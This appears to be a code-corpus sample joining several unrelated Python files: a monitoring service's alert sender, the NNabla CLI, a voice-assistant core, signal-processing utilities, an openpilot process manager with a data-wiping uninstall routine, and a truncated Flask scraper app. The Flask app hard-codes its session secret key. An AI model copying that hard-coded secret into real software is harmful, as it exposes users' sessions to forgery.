def add_arguments(self, parser):
parser.add_argument(
'--no-loop',
action='store_false',
dest='loop',
default=True,
help='Do not keep running indefinitely in a 2 second wait loop',
)
parser.add_argument(
'--no-threads',
action='store_false',
dest='use_threads',
default=False,
help='Send alerts synchronously, without using threads',
)
def process_one_flip(self, use_threads=True):
""" Find unprocessed flip, send notifications. """
# Order by processed, otherwise Django will automatically order by id
# and make the query less efficient
q = Flip.objects.filter(processed=None).order_by("processed")
flip = q.first()
if flip is None:
return False
q = Flip.objects.filter(id=flip.id, processed=None)
num_updated = q.update(processed=timezone.now())
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
if use_threads:
notify_on_thread(flip.id, self.stdout)
else:
notify(flip.id, self.stdout)
return True
def handle_going_down(self):
""" Process a single check going down. """
now = timezone.now()
# In PostgreSQL, add this index to run the below query efficiently:
# CREATE INDEX api_check_up ON api_check (alert_after) WHERE status = 'up'
q = Check.objects.filter(alert_after__lt=now).exclude(status="down")
# Sort by alert_after, to avoid unnecessary sorting by id:
check = q.order_by("alert_after").first()
if check is None:
return False
old_status = check.status
q = Check.objects.filter(id=check.id, status=old_status)
if check.get_status(with_started=False) != "down":
# It is not down yet. Update alert_after
q.update(alert_after=check.going_down_after())
return True
# Atomically update status
flip_time = check.going_down_after()
num_updated = q.update(alert_after=None, status="down")
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
flip = Flip(owner=check)
flip.created = flip_time
flip.old_status = old_status
flip.new_status = "down"
flip.save()
return True
def handle(self, use_threads=True, loop=True, *args, **options):
self.stdout.write("sendalerts is now running\n")
i, sent = 0, 0
while True:
# Create flips for any checks going down
while self.handle_going_down():
pass
# Process the unprocessed flips
while self.process_one_flip(use_threads):
sent += 1
if not loop:
break
time.sleep(2)
i += 1
if i % 60 == 0:
timestamp = timezone.now().isoformat()
self.stdout.write("-- MARK %s --\n" % timestamp)
return "Sent %d alert(s)" % sent
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
def _nnabla_version():
import nnabla
return 'Version {}'.format(nnabla.__version__) + \
', ' + \
'Build {}'.format(nnabla.__build_number__)
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
import nnabla
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
from nnabla.utils.cli.plot import (
add_plot_series_command, add_plot_timer_command)
add_plot_series_command(subparsers)
add_plot_timer_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface (Version {}, Build {})'.format(
nnabla.__version__, nnabla.__build_number__))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
return
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
if __name__ == '__main__':
main()
|
core.py
|
"""Voice Assistant core components."""
import threading
from typing import Any, Callable, Dict, List
import diskcache as dc
from voiceassistant.const import CACHE_DIR
VassJob = Callable[[], None]
class VoiceAssistant:
"""Voice Assistant root class."""
def __init__(self) -> None:
"""Initialize Voice Assistant."""
self._jobs: List[VassJob] = []
self.data: Dict[str, Any] = {}
self.cache: dc.Cache = dc.Cache(CACHE_DIR)
self.load_components()
def load_components(self) -> None:
"""Import and initialize Voice Assistant components.
Importing is done here because we make sure that on every
call this function reloads components' modules too.
Order of initialization matters.
"""
print("*** Loading Components ***")
from voiceassistant.addons import AddonsComponent
from voiceassistant.integrations import IntegrationsComponent
from voiceassistant.interfaces import InterfacesComponent
from voiceassistant.nlp import NaturalLanguageComponent
from voiceassistant.skills import SkillsComponent
self.nlp = NaturalLanguageComponent(self)
self.interfaces = InterfacesComponent(self)
self.skills = SkillsComponent(self)
self.addons = AddonsComponent(self)
self.integrations = IntegrationsComponent(self)
def add_job(self, job: VassJob) -> None:
"""Add job for Voice Assistant to run."""
self._jobs.append(job)
def run(self) -> None:
"""Run Voice Assistant jobs in separate threads."""
for job in self._jobs:
threading.Thread(target=job).start()
__all__ = ["VoiceAssistant"]
|
misc.py
|
# -*- coding: utf-8 -*-
"""Some miscellaneous utility functions."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
from contextlib import contextmanager
import fnmatch
import gc
import inspect
from math import log
import os
from queue import Queue, Empty
from string import Formatter
import subprocess
import sys
from threading import Thread
import traceback
import numpy as np
from ..utils import _check_option, _validate_type
from ..fixes import _get_args
from ._logging import logger, verbose, warn
def _pl(x, non_pl='', pl='s'):
"""Determine if plural should be used."""
len_x = x if isinstance(x, (int, np.generic)) else len(x)
return non_pl if len_x == 1 else pl
def _explain_exception(start=-1, stop=None, prefix='> '):
"""Explain an exception."""
# start=-1 means "only the most recent caller"
etype, value, tb = sys.exc_info()
string = traceback.format_list(traceback.extract_tb(tb)[start:stop])
string = (''.join(string).split('\n') +
traceback.format_exception_only(etype, value))
string = ':\n' + prefix + ('\n' + prefix).join(string)
return string
def _sort_keys(x):
"""Sort and return keys of dict."""
keys = list(x.keys()) # note: not thread-safe
idx = np.argsort([str(k) for k in keys])
keys = [keys[ii] for ii in idx]
return keys
class _DefaultEventParser:
"""Parse none standard events."""
def __init__(self):
self.event_ids = dict()
def __call__(self, description, offset=1):
if description not in self.event_ids:
self.event_ids[description] = offset + len(self.event_ids)
return self.event_ids[description]
class _FormatDict(dict):
"""Help pformat() work properly."""
def __missing__(self, key):
return "{" + key + "}"
def pformat(temp, **fmt):
"""Format a template string partially.
Examples
--------
>>> pformat("{a}_{b}", a='x')
'x_{b}'
"""
formatter = Formatter()
mapping = _FormatDict(fmt)
return formatter.vformat(temp, (), mapping)
def _enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
@verbose
def run_subprocess(command, return_code=False, verbose=None, *args, **kwargs):
"""Run command using subprocess.Popen.
Run command and wait for command to complete. If the return code was zero
then return, otherwise raise CalledProcessError.
By default, this will also add stdout= and stderr=subproces.PIPE
to the call to Popen to suppress printing to the terminal.
Parameters
----------
command : list of str | str
Command to run as subprocess (see subprocess.Popen documentation).
return_code : bool
If True, return the return code instead of raising an error if it's
non-zero.
.. versionadded:: 0.20
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
stdout : str
Stdout returned by the process.
stderr : str
Stderr returned by the process.
code : int
The return code, only returned if ``return_code == True``.
"""
all_out = ''
all_err = ''
# non-blocking adapted from https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python#4896288 # noqa: E501
out_q = Queue()
err_q = Queue()
with running_subprocess(command, *args, **kwargs) as p, p.stdout, p.stderr:
out_t = Thread(target=_enqueue_output, args=(p.stdout, out_q))
err_t = Thread(target=_enqueue_output, args=(p.stderr, err_q))
out_t.daemon = True
err_t.daemon = True
out_t.start()
err_t.start()
while True:
do_break = p.poll() is not None
# read all current lines without blocking
while True:
try:
out = out_q.get(timeout=0.01)
except Empty:
break
else:
out = out.decode('utf-8')
logger.info(out)
all_out += out
while True:
try:
err = err_q.get(timeout=0.01)
except Empty:
break
else:
err = err.decode('utf-8')
# Leave this as logger.warning rather than warn(...) to
# mirror the logger.info above for stdout. This function
# is basically just a version of subprocess.call, and
# shouldn't emit Python warnings due to stderr outputs
# (the calling function can check for stderr output and
# emit a warning if it wants).
logger.warning(err)
all_err += err
if do_break:
break
output = (all_out, all_err)
if return_code:
output = output + (p.returncode,)
elif p.returncode:
print(output)
err_fun = subprocess.CalledProcessError.__init__
if 'output' in _get_args(err_fun):
raise subprocess.CalledProcessError(p.returncode, command, output)
else:
raise subprocess.CalledProcessError(p.returncode, command)
return output
@contextmanager
def running_subprocess(command, after="wait", verbose=None, *args, **kwargs):
"""Context manager to do something with a command running via Popen.
Parameters
----------
command : list of str | str
Command to run as subprocess (see :class:`python:subprocess.Popen`).
after : str
Can be:
- "wait" to use :meth:`~python:subprocess.Popen.wait`
- "communicate" to use :meth:`~python.subprocess.Popen.communicate`
- "terminate" to use :meth:`~python:subprocess.Popen.terminate`
- "kill" to use :meth:`~python:subprocess.Popen.kill`
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
p : instance of Popen
The process.
"""
_validate_type(after, str, 'after')
_check_option('after', after, ['wait', 'terminate', 'kill', 'communicate'])
for stdxxx, sys_stdxxx in (['stderr', sys.stderr], ['stdout', sys.stdout]):
if stdxxx not in kwargs:
kwargs[stdxxx] = subprocess.PIPE
# Check the PATH environment variable. If run_subprocess() is to be called
# frequently this should be refactored so as to only check the path once.
env = kwargs.get('env', os.environ)
if any(p.startswith('~') for p in env['PATH'].split(os.pathsep)):
warn('Your PATH environment variable contains at least one path '
'starting with a tilde ("~") character. Such paths are not '
'interpreted correctly from within Python. It is recommended '
'that you use "$HOME" instead of "~".')
if isinstance(command, str):
command_str = command
else:
command = [str(s) for s in command]
command_str = ' '.join(s for s in command)
logger.info("Running subprocess: %s" % command_str)
try:
p = subprocess.Popen(command, *args, **kwargs)
except Exception:
if isinstance(command, str):
command_name = command.split()[0]
else:
command_name = command[0]
logger.error('Command not found: %s' % command_name)
raise
try:
yield p
finally:
getattr(p, after)()
p.wait()
def _clean_names(names, remove_whitespace=False, before_dash=True):
"""Remove white-space on topo matching.
This function handles different naming
conventions for old VS new VectorView systems (`remove_whitespace`).
Also it allows to remove system specific parts in CTF channel names
(`before_dash`).
Usage
-----
# for new VectorView (only inside layout)
ch_names = _clean_names(epochs.ch_names, remove_whitespace=True)
# for CTF
ch_names = _clean_names(epochs.ch_names, before_dash=True)
"""
cleaned = []
for name in names:
if ' ' in name and remove_whitespace:
name = name.replace(' ', '')
if '-' in name and before_dash:
name = name.split('-')[0]
if name.endswith('_v'):
name = name[:-2]
cleaned.append(name)
return cleaned
def _get_argvalues():
"""Return all arguments (except self) and values of read_raw_xxx."""
# call stack
# read_raw_xxx -> <decorator-gen-000> -> BaseRaw.__init__ -> _get_argvalues
# This is equivalent to `frame = inspect.stack(0)[4][0]` but faster
frame = inspect.currentframe()
try:
for _ in range(3):
frame = frame.f_back
fname = frame.f_code.co_filename
if not fnmatch.fnmatch(fname, '*/mne/io/*'):
return None
args, _, _, values = inspect.getargvalues(frame)
finally:
del frame
params = dict()
for arg in args:
params[arg] = values[arg]
params.pop('self', None)
return params
def sizeof_fmt(num):
"""Turn number of bytes into human-readable str.
Parameters
----------
num : int
The number of bytes.
Returns
-------
size : str
The size in human-readable format.
"""
units = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB']
decimals = [0, 0, 1, 2, 2, 2]
if num > 1:
exponent = min(int(log(num, 1024)), len(units) - 1)
quotient = float(num) / 1024 ** exponent
unit = units[exponent]
num_decimals = decimals[exponent]
format_string = '{0:.%sf} {1}' % (num_decimals)
return format_string.format(quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
def _file_like(obj):
# An alternative would be::
#
# isinstance(obj, (TextIOBase, BufferedIOBase, RawIOBase, IOBase))
#
# but this might be more robust to file-like objects not properly
# inheriting from these classes:
return all(callable(getattr(obj, name, None)) for name in ('read', 'seek'))
def _fullname(obj):
klass = obj.__class__
module = klass.__module__
if module == 'builtins':
return klass.__qualname__
return module + '.' + klass.__qualname__
def _assert_no_instances(cls, when=''):
__tracebackhide__ = True
n = 0
ref = list()
gc.collect()
objs = gc.get_objects()
for obj in objs:
try:
check = isinstance(obj, cls)
except Exception: # such as a weakref
check = False
if check:
if cls.__name__ == 'Brain':
ref.append(
f'Brain._cleaned = {getattr(obj, "_cleaned", None)}')
rr = gc.get_referrers(obj)
count = 0
for r in rr:
if r is not objs and \
r is not globals() and \
r is not locals() and \
not inspect.isframe(r):
if isinstance(r, (list, dict)):
rep = f'len={len(r)}'
r_ = gc.get_referrers(r)
types = (_fullname(x) for x in r_)
types = "/".join(sorted(set(
x for x in types if x is not None)))
rep += f', {len(r_)} referrers: {types}'
del r_
else:
rep = repr(r)[:100].replace('\n', ' ')
# If it's a __closure__, get more information
if rep.startswith('<cell at '):
try:
rep += f' ({repr(r.cell_contents)[:100]})'
except Exception:
pass
name = _fullname(r)
ref.append(f'{name}: {rep}')
count += 1
del r
del rr
n += count > 0
del obj
del objs
gc.collect()
assert n == 0, f'\n{n} {cls.__name__} @ {when}:\n' + '\n'.join(ref)
def _resource_path(submodule, filename):
"""Return a full system path to a package resource (AKA a file).
Parameters
----------
submodule : str
An import-style module or submodule name
(e.g., "mne.datasets.testing").
filename : str
The file whose full path you want.
Returns
-------
path : str
The full system path to the requested file.
"""
try:
from importlib.resources import files
return files(submodule).joinpath(filename)
except ImportError:
from pkg_resources import resource_filename
return resource_filename(submodule, filename)
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
neos_update_required = os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 9)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"mapd": "selfdrive.mapd.mapd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.sh"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"locationd": "selfdrive.locationd.locationd_local",
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"athena": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'deleter',
'ui',
'gpsd',
'updated',
'athena'
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'locationd',
'visiond',
'proclogd',
'ubloxd',
'mapd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.18:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
for p in running:
cloudlog.debug(" running %s %s" % (p, running[p]))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
app.py
|
from flask_sqlalchemy import SQLAlchemy
from flask import Flask,render_template
from flask import Flask,render_template,redirect, url_for,flash,request,jsonify,abort
import threading
from sqlalchemy import extract,func,desc
import datetime
import random
import markdown
import re
import time
import requests
import flask_bootstrap
import gunicorn
import gevent
from os import environ, path
from dotenv import load_dotenv
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
basedir = path.abspath(path.dirname(__file__))
load_dotenv(path.join(basedir, '.env'))
app = Flask(__name__)
app.secret_key = '11451419260817avdgsjrhsjaj4'
DIALECT = 'mysql'
DRIVER = 'pymysql'
USERNAME = 'root'
PASSWORD = environ.get('mysqlpassword')
HOST = '114.116.248.90'
PORT = '3306'
DATABASE = 'benben'
#app.config['SQLALCHEMY_DATABASE_URI'] = "{}+{}://{}:{}@{}:{}/{}?charset=utf8".format(DIALECT, DRIVER, USERNAME, PASSWORD, HOST, PORT,DATABASE)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+app.root_path+'/data.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from luogu_spider import doing,BenBen,LuoguUser
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import SubmitField, StringField,DateTimeField
from wtforms.validators import DataRequired,Length
import click
from flask_migrate import Migrate
migrate=Migrate(app,db)
bootstrap = Bootstrap(app)
thread = threading.Thread(target=doing)
thread.setDaemon(True)
thread.start()
limiter = Limiter(app, key_func=get_remote_address)
@app.route("/", methods=['GET', 'POST'])
def main():
cur = datetime.datetime.now()
v = BenBen.query.join(BenBen.user).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True
).count()
b = BenBen.query.join(BenBen.user).with_entities(func.count().label('count'), BenBen.username, BenBen.uid).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True
).group_by(BenBen.uid).order_by(desc(func.count())).limit(20)
# print(b)
class queryform (FlaskForm):
username = StringField(
'用户名', validators=[DataRequired(), Length(1, 20)])
submit = SubmitField('查询')
form = queryform()
if form.validate_on_submit():
user = LuoguUser.query.filter_by(username=form.username.data).first()
if user:
